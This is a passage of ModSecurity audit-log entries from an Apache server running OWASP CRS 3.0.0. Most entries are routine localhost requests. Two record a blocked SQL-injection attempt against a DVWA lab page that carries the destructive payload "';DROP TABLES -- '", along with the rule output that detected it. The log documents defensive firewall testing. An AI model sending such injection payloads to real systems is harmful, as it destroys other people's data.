Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:03 --0400","transaction_id":"WRc2438AAQEAAAkW4SIAAAAB","remote_address":"127.0.0.1","remote_port":42184,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2438AAQEAAAkW4SIAAAAB\"]"],"stopwatch":{"p1":391,"p2":1063,"p3":138,"p4":334,"p5":67,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:15 --0400","transaction_id":"WRc2738AAQEAAAkXs@sAAAAC","remote_address":"192.168.75.181","remote_port":46620,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2738AAQEAAAkXs@sAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2738AAQEAAAkXs@sAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2738AAQEAAAkXs@sAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2738AAQEAAAkXs@sAAAAC\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":605,"p2":2936,"p3":0,"p4":0,"p5":271,"sr":28,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:17 --0400","transaction_id":"WRc28X8AAQEAAAkXs@wAAAAC","remote_address":"192.168.75.181","remote_port":46620,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc28X8AAQEAAAkXs@wAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc28X8AAQEAAAkXs@wAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc28X8AAQEAAAkXs@wAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc28X8AAQEAAAkXs@wAAAAC\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":382,"p2":2019,"p3":0,"p4":0,"p5":158,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:25 --0400","transaction_id":"WRc2@X8AAQEAAAkYuFYAAAAD","remote_address":"127.0.0.1","remote_port":42190,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:40:00 GMT","If-None-Match":"\"294-54f6a791bc669\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:40:22 GMT","ETag":"\"295-54f6a7a6d5cf8\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc2@X8AAQEAAAkYuFYAAAAD\"]"],"stopwatch":{"p1":383,"p2":1113,"p3":60,"p4":147,"p5":52,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:25 --0400","transaction_id":"WRc2@X8AAQEAAAkYuFcAAAAD","remote_address":"127.0.0.1","remote_port":42190,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2@X8AAQEAAAkYuFcAAAAD\"]"],"stopwatch":{"p1":709,"p2":1219,"p3":69,"p4":465,"p5":71,"sr":30,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:40:25 --0400","transaction_id":"WRc2@X8AAQEAAAkYuFgAAAAD","remote_address":"127.0.0.1","remote_port":42190,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2@X8AAQEAAAkYuFgAAAAD\"]"],"stopwatch":{"p1":775,"p2":1300,"p3":114,"p4":423,"p5":91,"sr":38,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:44:44 --0400","transaction_id":"WRc3-H8AAQEAAAkVV5IAAAAA","remote_address":"127.0.0.1","remote_port":42586,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:40:22 GMT","If-None-Match":"\"295-54f6a7a6d5cf8\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:44:41 GMT","ETag":"\"295-54f6a89db971f\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file 